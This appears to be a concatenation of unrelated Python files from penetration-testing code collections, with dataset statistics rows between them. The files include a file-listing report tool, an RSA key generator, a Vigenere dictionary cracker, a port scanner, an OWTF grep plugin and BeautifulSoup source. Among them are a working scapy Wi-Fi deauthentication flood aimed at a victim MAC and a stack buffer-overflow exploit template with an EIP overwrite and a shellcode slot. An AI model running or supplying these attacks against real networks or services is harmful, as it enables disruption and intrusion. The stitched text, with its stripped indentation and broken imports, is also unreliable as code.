    The writeOutput function handles writing either the CSV or HTML reports
    :param cur: The sqlite3 database cursor object
    :param source: The output filepath
    :param custodian: Name of the custodian
    :return: None
    """
    custodian_id = getCustodian(cur, custodian)
    if not custodian_id:
        logging.error('Could not find custodian in database. '
                      'Please check the input of the custodian name and database path')
        # Bug fix: previously execution fell through here and raised a
        # NameError on the unbound 'count' variable below.
        return
    custodian_id = custodian_id[0]
    # Parameterized query instead of string concatenation.
    cur.execute("SELECT COUNT(id) FROM Files where custodian = ?", (custodian_id,))
    count = cur.fetchone()
    if not count or not count[0] > 0:
        logging.error('Files not found for custodian')
    elif source.endswith('.csv'):
        writeCSV(cur, source, custodian_id)
    elif source.endswith('.html'):
        writeHTML(cur, source, custodian_id, custodian)
    else:
        # Unrecognised extension (the old separate 'Unknown Error Occurred'
        # branch was unreachable).
        logging.error('Could not determine file type')
def writeCSV(cur, source, custodian_id):
    """
    The writeCSV function generates a CSV report from the Files table
    :param cur: The Sqlite3 database cursor object
    :param source: The output filepath
    :param custodian_id: The custodian ID
    :return: None
    """
    # Parameterized query instead of string concatenation (SQL injection /
    # quoting safety).
    cur.execute("SELECT * FROM Files where custodian = ?", (custodian_id,))
    column_names = [description[0] for description in cur.description]
    logging.info('Writing CSV report')
    with open(source, 'w') as csv_file:
        csv_writer = csv.writer(csv_file)
        csv_writer.writerow(column_names)
        for entry in cur.fetchall():
            csv_writer.writerow(entry)
        csv_file.flush()
    logging.info('CSV report completed: ' + source)
def writeHTML(cur, source, custodian_id, custodian_name):
    """
    The writeHTML function generates an HTML report from the Files table
    :param cur: The sqlite3 database cursor object
    :param source: The output filepath
    :param custodian_id: The custodian ID
    :param custodian_name: The custodian's display name for the heading
    :return: None
    """
    # NOTE(review): string-built SQL; custodian_id comes from the database
    # here, but a parameterized query would still be safer.
    sql = "SELECT * FROM Files where custodian = '" + str(custodian_id) + "'"
    cur.execute(sql)
    column_names = [description[0] for description in cur.description]
    table_header = '</th><th>'.join(column_names)
    table_header = '<tr><th>' + table_header + '</th></tr>'
    logging.info('Writing HTML report')
    with open(source, 'w') as html_file:
        html_string = "<html><body>\n"
        html_string += '<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">\n'
        html_string += "<h1>File Listing for Custodian ID: " + str(custodian_id) + ", " + custodian_name + "</h1>\n"
        html_string += "<table class='table table-hover table-striped'>\n"
        html_file.write(html_string)
        html_file.write(table_header)
        for entry in cur.fetchall():
            # NOTE(review): str(x).encode('utf-8') is Python-2 behavior;
            # under Python 3 this would produce bytes reprs in the output.
            row_data = "</td><td>".join([str(x).encode('utf-8') for x in entry])
            html_string = "\n<tr><td>" + row_data + "</td></tr>"
            html_file.write(html_string)
            html_file.flush()
        html_string = "\n</table>\n</body></html>"
        html_file.write(html_string)
    logging.info('HTML Report completed: ' + source)
if __name__ == '__main__':
    # NOTE(review): the 'version=' keyword is Python-2-era argparse; it was
    # removed from ArgumentParser in Python 3.
    parser = argparse.ArgumentParser(version=str(__version__), description=__description__,
                                     epilog='Developed by ' + __author__ + ' on ' + __date__)
    parser.add_argument('CUSTODIAN', help='Name of custodian collection is of.')
    parser.add_argument('DB_PATH', help='File path and name of database file to create/append.')
    parser.add_argument('--input', help='Base directory to scan.')
    parser.add_argument('--output', help='Output file to write to. use `.csv` extension for CSV and `.html` for HTML')
    parser.add_argument('-l', help='File path and name of log file.')
    args = parser.parse_args()
    # Exactly one of --input/--output selects the run mode.
    if args.input:
        source = ('input', args.input)
    elif args.output:
        source = ('output', args.output)
    else:
        raise argparse.ArgumentError('Please specify input or output')
    if args.l:
        if not os.path.exists(args.l):
            os.makedirs(args.l) # create log directory path
        log_path = os.path.join(args.l, 'file_lister.log')
    else:
        log_path = 'file_lister.log'
    logging.basicConfig(filename=log_path, level=logging.DEBUG,
                        format='%(asctime)s | %(levelname)s | %(message)s', filemode='a')
    logging.info('Starting File Lister v.' + str(__version__))
    logging.debug('System ' + sys.platform)
    logging.debug('Version ' + sys.version)
    args_dict = {'custodian': args.CUSTODIAN, 'source': source, 'db': args.DB_PATH}
    main(**args_dict)
# RSA Key Generator
# http://inventwithpython.com/hacking (BSD Licensed)
import random, sys, os, rabinMiller, cryptomath
def main():
    """Generate a demo 1024-bit RSA key pair for user 'al_sweigart'."""
    # create a public/private keypair with 1024 bit keys
    print('Making key files...')
    makeKeyFiles('al_sweigart', 1024)
    print('Key files made.')
def generateKey(keySize):
    """Return (publicKey, privateKey), each a (n, exponent) tuple, built
    from two keySize-bit primes supplied by the rabinMiller module."""
    # Creates a public/private key pair with keys that are keySize bits in
    # size. This function may take a while to run.
    # Step 1: Create two prime numbers, p and q. Calculate n = p * q.
    print('Generating p prime...')
    p = rabinMiller.generateLargePrime(keySize)
    print('Generating q prime...')
    q = rabinMiller.generateLargePrime(keySize)
    n = p * q
    # Step 2: Create a number e that is relatively prime to (p-1)*(q-1).
    print('Generating e that is relatively prime to (p-1)*(q-1)...')
    while True:
        # Keep trying random numbers for e until one is valid.
        e = random.randrange(2 ** (keySize - 1), 2 ** (keySize))
        if cryptomath.gcd(e, (p - 1) * (q - 1)) == 1:
            break
    # Step 3: Calculate d, the mod inverse of e.
    print('Calculating d that is mod inverse of e...')
    d = cryptomath.findModInverse(e, (p - 1) * (q - 1))
    publicKey = (n, e)
    privateKey = (n, d)
    print('Public key:', publicKey)
    print('Private key:', privateKey)
    return (publicKey, privateKey)
def makeKeyFiles(name, keySize):
    """Generate a keySize-bit RSA key pair and write it to
    <name>_pubkey.txt and <name>_privkey.txt as 'keySize,n,exponent',
    refusing to overwrite existing key files."""
    # Our safety check will prevent us from overwriting our old key files:
    if os.path.exists('%s_pubkey.txt' % (name)) or os.path.exists('%s_privkey.txt' % (name)):
        sys.exit('WARNING: The file %s_pubkey.txt or %s_privkey.txt already exists! Use a different name or delete these files and re-run this program.' % (name, name))
    publicKey, privateKey = generateKey(keySize)
    print()
    print('The public key is a %s and a %s digit number.' % (len(str(publicKey[0])), len(str(publicKey[1]))))
    print('Writing public key to file %s_pubkey.txt...' % (name))
    fo = open('%s_pubkey.txt' % (name), 'w')
    fo.write('%s,%s,%s' % (keySize, publicKey[0], publicKey[1]))
    fo.close()
    print()
    # Bug fix: this message previously reported the *public* key's digit
    # counts (copy-paste error) instead of the private key's.
    print('The private key is a %s and a %s digit number.' % (len(str(privateKey[0])), len(str(privateKey[1]))))
    print('Writing private key to file %s_privkey.txt...' % (name))
    fo = open('%s_privkey.txt' % (name), 'w')
    fo.write('%s,%s,%s' % (keySize, privateKey[0], privateKey[1]))
    fo.close()
# If makeRsaKeys.py is run (instead of imported as a module) call
# the main() function.
if __name__ == '__main__':
    main()
# Vigenere Cipher Dictionary Hacker
# http://inventwithpython.com/hacking (BSD Licensed)
import detectEnglish, vigenereCipher, pyperclip
def main():
    """Run the dictionary attack against a hard-coded ciphertext and copy
    a successful break to the clipboard."""
    ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
    hackedMessage = hackVigenere(ciphertext)
    if hackedMessage != None:
        print('Copying hacked message to clipboard:')
        print(hackedMessage)
        pyperclip.copy(hackedMessage)
    else:
        print('Failed to hack encryption.')
def hackVigenere(ciphertext):
    """Try every word in dictionary.txt as a Vigenere key.

    Returns the decrypted text once the user confirms a candidate looks
    like English, or None when no dictionary word works.
    """
    # 'with' guarantees the dictionary file is closed even if reading it
    # raises (the original leaked the handle on that path).
    with open('dictionary.txt') as fo:
        words = fo.readlines()
    for word in words:
        word = word.strip() # remove the newline at the end
        decryptedText = vigenereCipher.decryptMessage(word, ciphertext)
        if detectEnglish.isEnglish(decryptedText, wordPercentage=40):
            # Check with user to see if the decrypted key has been found.
            print()
            print('Possible encryption break:')
            print('Key ' + str(word) + ': ' + decryptedText[:100])
            print()
            print('Enter D for done, or just press Enter to continue breaking:')
            response = input('> ')
            if response.upper().startswith('D'):
                return decryptedText
    # Explicit: every candidate was rejected (original fell off the end).
    return None
# If vigenereDictionaryHacker.py is run directly (instead of imported
# as a module), launch the dictionary attack.
if __name__ == '__main__':
    main()
| 31.75 | 81 | 0.605806 |
cybersecurity-penetration-testing | import Queue
import threading
import screenshot
import requests
portList = [80,443,2082,2083,2086,2087,2095,2096,8080,8880,8443,9998,4643,9001,4489]
IP = '127.0.0.1'
http = 'http://'
https = 'https://'
def testAndSave(protocol, portNumber):
url = protocol + IP + ':' + str(portNumber)
try:
r = requests.get(url,timeout=1)
if r.status_code == 200:
print 'Found site on ' + url
s = screenshot.Screenshot()
image = s.get_image(url)
image.save(str(portNumber) + '.png')
except:
pass
def threader(q, port):
    # Worker body: probe the port over both schemes, parking the results
    # on the shared queue so the main thread can wait on them.
    for scheme in (http, https):
        q.put(testAndSave(scheme, port))
# Spawn one worker thread per candidate port.
q = Queue.Queue()
for port in portList:
    t = threading.Thread(target=threader, args=(q, port))
    # Bug fix: the attribute is 'daemon' (the original's 'deamon' typo
    # silently created an unused attribute, leaving threads non-daemonic).
    t.daemon = True
    t.start()
    s = q.get()
| 21.657895 | 85 | 0.57093 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Chris Duffy
Date: May 2015
Name: tcp_exploit.py
Purpose: An sample exploit for testing TCP services
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys, socket, strut
rhost = ""
lhost = ""
rport =
fill ="A"*####
eip = struct.pack('<I',0x########)
offset = "\x90"*##
available_shellcode_space = ###
shell =() #Code to insert
# NOPs to fill the remaining space
exploit = fill + eip + offset + shell
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.sendto(exploit, (rhost, rport))
| 44.488372 | 89 | 0.774936 |
Python-Penetration-Testing-for-Developers | from scapy.all import *
import sys
# Monitor-mode interface the forged frames are injected on.
interface = "mon0"
BSSID = raw_input("Enter the MAC of AP ")
victim_mac = raw_input("Enter the MAC of Victim ")
# 802.11 deauthentication frame: addressed to the victim (addr1) and
# spoofed so it appears to come from the AP (addr2/addr3 = BSSID).
frame= RadioTap()/ Dot11(addr1=victim_mac,addr2=BSSID, addr3=BSSID)/ Dot11Deauth()
# Inject 1000 copies, one every 0.1 s, to keep the victim disconnected.
sendp(frame,iface=interface, count= 1000, inter= .1)
| 27.6 | 82 | 0.722807 |
owtf | """
GREP Plugin for Spiders,Crawlers and Robots
NOTE: GREP plugins do NOT send traffic to the target and only grep the HTTP Transaction Log
"""
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Searches transaction DB for Robots meta tag and X-Robots-Tag HTTP header"
def run(PluginInfo):
    """Grep the transaction DB for robots-related headers and meta tags."""
    intro = plugin_helper.HtmlString(
        "This plugin looks for Robots meta tag and X-Robots-Tag HTTP header<br />"
    )
    # Matches from response headers, then from response bodies.
    header_hits = plugin_helper.FindResponseHeaderMatchesForRegexpName("HEADERS_FOR_ROBOTS")
    body_hits = plugin_helper.FindResponseBodyMatchesForRegexpName("RESPONSE_REGEXP_FOR_ROBOTS_META_TAG")
    return intro + header_hits + body_hits
| 32.9 | 91 | 0.741507 |
PenetrationTestingScripts | """Beautiful Soup
Elixir and Tonic
"The Screen-Scraper's Friend"
v2.1.1
http://www.crummy.com/software/BeautifulSoup/
Beautiful Soup parses arbitrarily invalid XML- or HTML-like substance
into a tree representation. It provides methods and Pythonic idioms
that make it easy to search and modify the tree.
A well-formed XML/HTML document will yield a well-formed data
structure. An ill-formed XML/HTML document will yield a
correspondingly ill-formed data structure. If your document is only
locally well-formed, you can use this library to find and process the
well-formed part of it. The BeautifulSoup class has heuristics for
obtaining a sensible parse tree in the face of common HTML errors.
Beautiful Soup has no external dependencies. It works with Python 2.2
and up.
Beautiful Soup defines classes for four different parsing strategies:
* BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific
language that kind of looks like XML.
* BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid
or invalid.
* ICantBelieveItsBeautifulSoup, for parsing valid but bizarre HTML
that trips up BeautifulSoup.
* BeautifulSOAP, for making it easier to parse XML documents that use
lots of subelements containing a single string, where you'd prefer
they put that string into an attribute (such as SOAP messages).
You can subclass BeautifulStoneSoup or BeautifulSoup to create a
parsing strategy specific to an XML schema or a particular bizarre
HTML document. Typically your subclass would just override
SELF_CLOSING_TAGS and/or NESTABLE_TAGS.
""" #"
from __future__ import generators
__author__ = "Leonard Richardson ([email protected])"
__version__ = "2.1.1"
__date__ = "$Date: 2004/10/18 00:14:20 $"
__copyright__ = "Copyright (c) 2004-2005 Leonard Richardson"
__license__ = "PSF"
from _sgmllib_copy import SGMLParser, SGMLParseError
import types
import re
import _sgmllib_copy as sgmllib
class NullType(object):
    """A black-hole singleton type.

    Like NoneType, but its single instance ('Null', created immediately
    after this class) absorbs any call, attribute access, or item access
    and hands back itself, so chained navigation never raises.

    >>> Null("send", "a", "message")("and one more",
    ...      "and what you get still") is Null
    True
    """
    def __new__(cls):
        # Constructing the type always yields the shared singleton.
        return Null

    def __call__(self, *args, **kwargs):
        return Null

    def __getattr__(self, attr):
        return Null

    def __getitem__(self, item):
        return Null

    def __setattr__(self, attr, value):
        # Writes are silently discarded.
        pass

    def __setitem__(self, item, value):
        pass

    def __len__(self):
        return 0

    def __iter__(self):
        # An empty iterator, so ``for x in Null: pass`` terminates.
        return iter([])

    def __contains__(self, item):
        return False

    def __repr__(self):
        return "Null"
# The one shared instance.  Built with object.__new__ so that
# NullType.__new__ (which returns Null) is bypassed while the name
# 'Null' does not exist yet.
Null = object.__new__(NullType)
class PageElement:
"""Contains the navigational information for some part of the page
(either a tag or a piece of text)"""
def setup(self, parent=Null, previous=Null):
"""Sets up the initial relations between this element and
other elements."""
self.parent = parent
self.previous = previous
self.next = Null
self.previousSibling = Null
self.nextSibling = Null
if self.parent and self.parent.contents:
self.previousSibling = self.parent.contents[-1]
self.previousSibling.nextSibling = self
def findNext(self, name=None, attrs={}, text=None):
"""Returns the first item that matches the given criteria and
appears after this Tag in the document."""
return self._first(self.fetchNext, name, attrs, text)
firstNext = findNext
def fetchNext(self, name=None, attrs={}, text=None, limit=None):
"""Returns all items that match the given criteria and appear
before after Tag in the document."""
return self._fetch(name, attrs, text, limit, self.nextGenerator)
def findNextSibling(self, name=None, attrs={}, text=None):
"""Returns the closest sibling to this Tag that matches the
given criteria and appears after this Tag in the document."""
return self._first(self.fetchNextSiblings, name, attrs, text)
firstNextSibling = findNextSibling
def fetchNextSiblings(self, name=None, attrs={}, text=None, limit=None):
"""Returns the siblings of this Tag that match the given
criteria and appear after this Tag in the document."""
return self._fetch(name, attrs, text, limit, self.nextSiblingGenerator)
def findPrevious(self, name=None, attrs={}, text=None):
"""Returns the first item that matches the given criteria and
appears before this Tag in the document."""
return self._first(self.fetchPrevious, name, attrs, text)
def fetchPrevious(self, name=None, attrs={}, text=None, limit=None):
"""Returns all items that match the given criteria and appear
before this Tag in the document."""
return self._fetch(name, attrs, text, limit, self.previousGenerator)
firstPrevious = findPrevious
def findPreviousSibling(self, name=None, attrs={}, text=None):
"""Returns the closest sibling to this Tag that matches the
given criteria and appears before this Tag in the document."""
return self._first(self.fetchPreviousSiblings, name, attrs, text)
firstPreviousSibling = findPreviousSibling
def fetchPreviousSiblings(self, name=None, attrs={}, text=None,
limit=None):
"""Returns the siblings of this Tag that match the given
criteria and appear before this Tag in the document."""
return self._fetch(name, attrs, text, limit,
self.previousSiblingGenerator)
def findParent(self, name=None, attrs={}):
"""Returns the closest parent of this Tag that matches the given
criteria."""
r = Null
l = self.fetchParents(name, attrs, 1)
if l:
r = l[0]
return r
firstParent = findParent
def fetchParents(self, name=None, attrs={}, limit=None):
"""Returns the parents of this Tag that match the given
criteria."""
return self._fetch(name, attrs, None, limit, self.parentGenerator)
#These methods do the real heavy lifting.
def _first(self, method, name, attrs, text):
r = Null
l = method(name, attrs, text, 1)
if l:
r = l[0]
return r
def _fetch(self, name, attrs, text, limit, generator):
"Iterates over a generator looking for things that match."
if not hasattr(attrs, 'items'):
attrs = {'class' : attrs}
results = []
g = generator()
while True:
try:
i = g.next()
except StopIteration:
break
found = None
if isinstance(i, Tag):
if not text:
if not name or self._matches(i, name):
match = True
for attr, matchAgainst in attrs.items():
check = i.get(attr)
if not self._matches(check, matchAgainst):
match = False
break
if match:
found = i
elif text:
if self._matches(i, text):
found = i
if found:
results.append(found)
if limit and len(results) >= limit:
break
return results
#Generators that can be used to navigate starting from both
#NavigableTexts and Tags.
def nextGenerator(self):
i = self
while i:
i = i.next
yield i
def nextSiblingGenerator(self):
i = self
while i:
i = i.nextSibling
yield i
def previousGenerator(self):
i = self
while i:
i = i.previous
yield i
def previousSiblingGenerator(self):
i = self
while i:
i = i.previousSibling
yield i
def parentGenerator(self):
i = self
while i:
i = i.parent
yield i
def _matches(self, chunk, howToMatch):
#print 'looking for %s in %s' % (howToMatch, chunk)
#
# If given a list of items, return true if the list contains a
# text element that matches.
if isList(chunk) and not isinstance(chunk, Tag):
for tag in chunk:
if isinstance(tag, NavigableText) and self._matches(tag, howToMatch):
return True
return False
if callable(howToMatch):
return howToMatch(chunk)
if isinstance(chunk, Tag):
#Custom match methods take the tag as an argument, but all other
#ways of matching match the tag name as a string
chunk = chunk.name
#Now we know that chunk is a string
if not isinstance(chunk, basestring):
chunk = str(chunk)
if hasattr(howToMatch, 'match'):
# It's a regexp object.
return howToMatch.search(chunk)
if isList(howToMatch):
return chunk in howToMatch
if hasattr(howToMatch, 'items'):
return howToMatch.has_key(chunk)
#It's just a string
return str(howToMatch) == chunk
class NavigableText(PageElement):
    """Mixin for text nodes in the parse tree."""

    def __getattr__(self, attr):
        "For backwards compatibility, text.string gives you text"
        # Guard clause: only the legacy '.string' alias is supported.
        if attr == 'string':
            return self
        raise AttributeError("'%s' object has no attribute '%s'" % (self.__class__.__name__, attr))
class NavigableString(str, NavigableText):
    """Text node backed by a byte string; navigation comes from
    NavigableText/PageElement."""
    pass
class NavigableUnicodeString(unicode, NavigableText):
    """Text node backed by a Unicode string (Python 2 ``unicode``)."""
    pass
class Tag(PageElement):
"""Represents a found HTML tag with its attributes and contents."""
def __init__(self, name, attrs=None, parent=Null, previous=Null):
"Basic constructor."
self.name = name
if attrs == None:
attrs = []
self.attrs = attrs
self.contents = []
self.setup(parent, previous)
self.hidden = False
def get(self, key, default=None):
"""Returns the value of the 'key' attribute for the tag, or
the value given for 'default' if it doesn't have that
attribute."""
return self._getAttrMap().get(key, default)
def __getitem__(self, key):
"""tag[key] returns the value of the 'key' attribute for the tag,
and throws an exception if it's not there."""
return self._getAttrMap()[key]
def __iter__(self):
"Iterating over a tag iterates over its contents."
return iter(self.contents)
def __len__(self):
"The length of a tag is the length of its list of contents."
return len(self.contents)
def __contains__(self, x):
return x in self.contents
def __nonzero__(self):
"A tag is non-None even if it has no contents."
return True
def __setitem__(self, key, value):
"""Setting tag[key] sets the value of the 'key' attribute for the
tag."""
self._getAttrMap()
self.attrMap[key] = value
found = False
for i in range(0, len(self.attrs)):
if self.attrs[i][0] == key:
self.attrs[i] = (key, value)
found = True
if not found:
self.attrs.append((key, value))
self._getAttrMap()[key] = value
def __delitem__(self, key):
"Deleting tag[key] deletes all 'key' attributes for the tag."
for item in self.attrs:
if item[0] == key:
self.attrs.remove(item)
#We don't break because bad HTML can define the same
#attribute multiple times.
self._getAttrMap()
if self.attrMap.has_key(key):
del self.attrMap[key]
def __call__(self, *args, **kwargs):
"""Calling a tag like a function is the same as calling its
fetch() method. Eg. tag('a') returns a list of all the A tags
found within this tag."""
return apply(self.fetch, args, kwargs)
def __getattr__(self, tag):
if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3:
return self.first(tag[:-3])
elif tag.find('__') != 0:
return self.first(tag)
def __eq__(self, other):
"""Returns true iff this tag has the same name, the same attributes,
and the same contents (recursively) as the given tag.
NOTE: right now this will return false if two tags have the
same attributes in a different order. Should this be fixed?"""
if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other):
return False
for i in range(0, len(self.contents)):
if self.contents[i] != other.contents[i]:
return False
return True
def __ne__(self, other):
"""Returns true iff this tag is not identical to the other tag,
as defined in __eq__."""
return not self == other
def __repr__(self):
"""Renders this tag as a string."""
return str(self)
def __unicode__(self):
return self.__str__(1)
def __str__(self, needUnicode=None, showStructureIndent=None):
"""Returns a string or Unicode representation of this tag and
its contents.
NOTE: since Python's HTML parser consumes whitespace, this
method is not certain to reproduce the whitespace present in
the original string."""
attrs = []
if self.attrs:
for key, val in self.attrs:
attrs.append('%s="%s"' % (key, val))
close = ''
closeTag = ''
if self.isSelfClosing():
close = ' /'
else:
closeTag = '</%s>' % self.name
indentIncrement = None
if showStructureIndent != None:
indentIncrement = showStructureIndent
if not self.hidden:
indentIncrement += 1
contents = self.renderContents(indentIncrement, needUnicode=needUnicode)
if showStructureIndent:
space = '\n%s' % (' ' * showStructureIndent)
if self.hidden:
s = contents
else:
s = []
attributeString = ''
if attrs:
attributeString = ' ' + ' '.join(attrs)
if showStructureIndent:
s.append(space)
s.append('<%s%s%s>' % (self.name, attributeString, close))
s.append(contents)
if closeTag and showStructureIndent != None:
s.append(space)
s.append(closeTag)
s = ''.join(s)
isUnicode = type(s) == types.UnicodeType
if needUnicode and not isUnicode:
s = unicode(s)
elif isUnicode and needUnicode==False:
s = str(s)
return s
def prettify(self, needUnicode=None):
return self.__str__(needUnicode, showStructureIndent=True)
def renderContents(self, showStructureIndent=None, needUnicode=None):
"""Renders the contents of this tag as a (possibly Unicode)
string."""
s=[]
for c in self:
text = None
if isinstance(c, NavigableUnicodeString) or type(c) == types.UnicodeType:
text = unicode(c)
elif isinstance(c, Tag):
s.append(c.__str__(needUnicode, showStructureIndent))
elif needUnicode:
text = unicode(c)
else:
text = str(c)
if text:
if showStructureIndent != None:
if text[-1] == '\n':
text = text[:-1]
s.append(text)
return ''.join(s)
#Soup methods
def firstText(self, text, recursive=True):
"""Convenience method to retrieve the first piece of text matching the
given criteria. 'text' can be a string, a regular expression object,
a callable that takes a string and returns whether or not the
string 'matches', etc."""
return self.first(recursive=recursive, text=text)
def fetchText(self, text, recursive=True, limit=None):
"""Convenience method to retrieve all pieces of text matching the
given criteria. 'text' can be a string, a regular expression object,
a callable that takes a string and returns whether or not the
string 'matches', etc."""
return self.fetch(recursive=recursive, text=text, limit=limit)
def first(self, name=None, attrs={}, recursive=True, text=None):
"""Return only the first child of this
Tag matching the given criteria."""
r = Null
l = self.fetch(name, attrs, recursive, text, 1)
if l:
r = l[0]
return r
findChild = first
def fetch(self, name=None, attrs={}, recursive=True, text=None,
limit=None):
"""Extracts a list of Tag objects that match the given
criteria. You can specify the name of the Tag and any
attributes you want the Tag to have.
The value of a key-value pair in the 'attrs' map can be a
string, a list of strings, a regular expression object, or a
callable that takes a string and returns whether or not the
string matches for some custom definition of 'matches'. The
same is true of the tag name."""
generator = self.recursiveChildGenerator
if not recursive:
generator = self.childGenerator
return self._fetch(name, attrs, text, limit, generator)
fetchChildren = fetch
#Utility methods
def isSelfClosing(self):
"""Returns true iff this is a self-closing tag as defined in the HTML
standard.
TODO: This is specific to BeautifulSoup and its subclasses, but it's
used by __str__"""
return self.name in BeautifulSoup.SELF_CLOSING_TAGS
def append(self, tag):
"""Appends the given tag to the contents of this tag."""
self.contents.append(tag)
#Private methods
def _getAttrMap(self):
"""Initializes a map representation of this tag's attributes,
if not already initialized."""
if not getattr(self, 'attrMap'):
self.attrMap = {}
for (key, value) in self.attrs:
self.attrMap[key] = value
return self.attrMap
#Generator methods
def childGenerator(self):
for i in range(0, len(self.contents)):
yield self.contents[i]
raise StopIteration
def recursiveChildGenerator(self):
stack = [(self, 0)]
while stack:
tag, start = stack.pop()
if isinstance(tag, Tag):
for i in range(start, len(tag.contents)):
a = tag.contents[i]
yield a
if isinstance(a, Tag) and tag.contents:
if i < len(tag.contents) - 1:
stack.append((tag, i+1))
stack.append((a, 0))
break
raise StopIteration
def isList(l):
    """Return a true value if *l* is list-like (iterable, or a plain
    list/tuple), in a way that works on every Python 2.x release."""
    if hasattr(l, '__iter__'):
        return True
    # Pre-2.2 fallback: lists/tuples had no __iter__ attribute.
    return type(l) in (types.ListType, types.TupleType)
def buildTagMap(default, *args):
    """Flatten maps, lists, and scalars into one dict.

    Map arguments are merged in as-is (later ones win); list items and
    bare scalars become keys mapped to *default*.  Used to assemble the
    SELF_CLOSING_TAGS and NESTABLE_TAGS maps from lists and partial maps.
    """
    merged = {}
    for chunk in args:
        if hasattr(chunk, 'items'):
            # Dictionary: copy its pairs straight over.
            merged.update(chunk)
        elif isList(chunk):
            # Sequence: every element keys the default value.
            for key in chunk:
                merged[key] = default
        else:
            # Scalar: a single key for the default value.
            merged[chunk] = default
    return merged
class BeautifulStoneSoup(Tag, SGMLParser):
"""This class contains the basic parser and fetch code. It defines
a parser that knows nothing about tag behavior except for the
following:
You can't close a tag without closing all the tags it encloses.
That is, "<foo><bar></foo>" actually means
"<foo><bar></bar></foo>".
[Another possible explanation is "<foo><bar /></foo>", but since
this class defines no SELF_CLOSING_TAGS, it will never use that
explanation.]
This class is useful for parsing XML or made-up markup languages,
or when BeautifulSoup makes an assumption counter to what you were
expecting."""
SELF_CLOSING_TAGS = {}
NESTABLE_TAGS = {}
RESET_NESTING_TAGS = {}
QUOTE_TAGS = {}
#As a public service we will by default silently replace MS smart quotes
#and similar characters with their HTML or ASCII equivalents.
MS_CHARS = { '\x80' : '€',
'\x81' : ' ',
'\x82' : '‚',
'\x83' : 'ƒ',
'\x84' : '„',
'\x85' : '…',
'\x86' : '†',
'\x87' : '‡',
'\x88' : '⁁',
'\x89' : '%',
'\x8A' : 'Š',
'\x8B' : '<',
'\x8C' : 'Œ',
'\x8D' : '?',
'\x8E' : 'Z',
'\x8F' : '?',
'\x90' : '?',
'\x91' : '‘',
'\x92' : '’',
'\x93' : '“',
'\x94' : '”',
'\x95' : '•',
'\x96' : '–',
'\x97' : '—',
'\x98' : '˜',
'\x99' : '™',
'\x9a' : 'š',
'\x9b' : '>',
'\x9c' : 'œ',
'\x9d' : '?',
'\x9e' : 'z',
'\x9f' : 'Ÿ',}
PARSER_MASSAGE = [(re.compile('(<[^<>]*)/>'),
lambda(x):x.group(1) + ' />'),
(re.compile('<!\s+([^<>]*)>'),
lambda(x):'<!' + x.group(1) + '>'),
(re.compile("([\x80-\x9f])"),
lambda(x): BeautifulStoneSoup.MS_CHARS.get(x.group(1)))
]
ROOT_TAG_NAME = '[document]'
def __init__(self, text=None, avoidParserProblems=True,
initialTextIsEverything=True):
"""Initialize this as the 'root tag' and feed in any text to
the parser.
NOTE about avoidParserProblems: sgmllib will process most bad
HTML, and BeautifulSoup has tricks for dealing with some HTML
that kills sgmllib, but Beautiful Soup can nonetheless choke
or lose data if your data uses self-closing tags or
declarations incorrectly. By default, Beautiful Soup sanitizes
its input to avoid the vast majority of these problems. The
problems are relatively rare, even in bad HTML, so feel free
to pass in False to avoidParserProblems if they don't apply to
you, and you'll get better performance. The only reason I have
this turned on by default is so I don't get so many tech
support questions.
The two most common instances of invalid HTML that will choke
sgmllib are fixed by the default parser massage techniques:
<br/> (No space between name of closing tag and tag close)
<! --Comment--> (Extraneous whitespace in declaration)
You can pass in a custom list of (RE object, replace method)
tuples to get Beautiful Soup to scrub your input the way you
want."""
Tag.__init__(self, self.ROOT_TAG_NAME)
if avoidParserProblems \
and not isList(avoidParserProblems):
avoidParserProblems = self.PARSER_MASSAGE
self.avoidParserProblems = avoidParserProblems
SGMLParser.__init__(self)
self.quoteStack = []
self.hidden = 1
self.reset()
if hasattr(text, 'read'):
#It's a file-type object.
text = text.read()
if text:
self.feed(text)
if initialTextIsEverything:
self.done()
def __getattr__(self, methodName):
"""This method routes method call requests to either the SGMLParser
superclass or the Tag superclass, depending on the method name."""
if methodName.find('start_') == 0 or methodName.find('end_') == 0 \
or methodName.find('do_') == 0:
return SGMLParser.__getattr__(self, methodName)
elif methodName.find('__') != 0:
return Tag.__getattr__(self, methodName)
else:
raise AttributeError
def feed(self, text):
if self.avoidParserProblems:
for fix, m in self.avoidParserProblems:
text = fix.sub(m, text)
SGMLParser.feed(self, text)
def done(self):
"""Called when you're done parsing, so that the unclosed tags can be
correctly processed."""
self.endData() #NEW
while self.currentTag.name != self.ROOT_TAG_NAME:
self.popTag()
def reset(self):
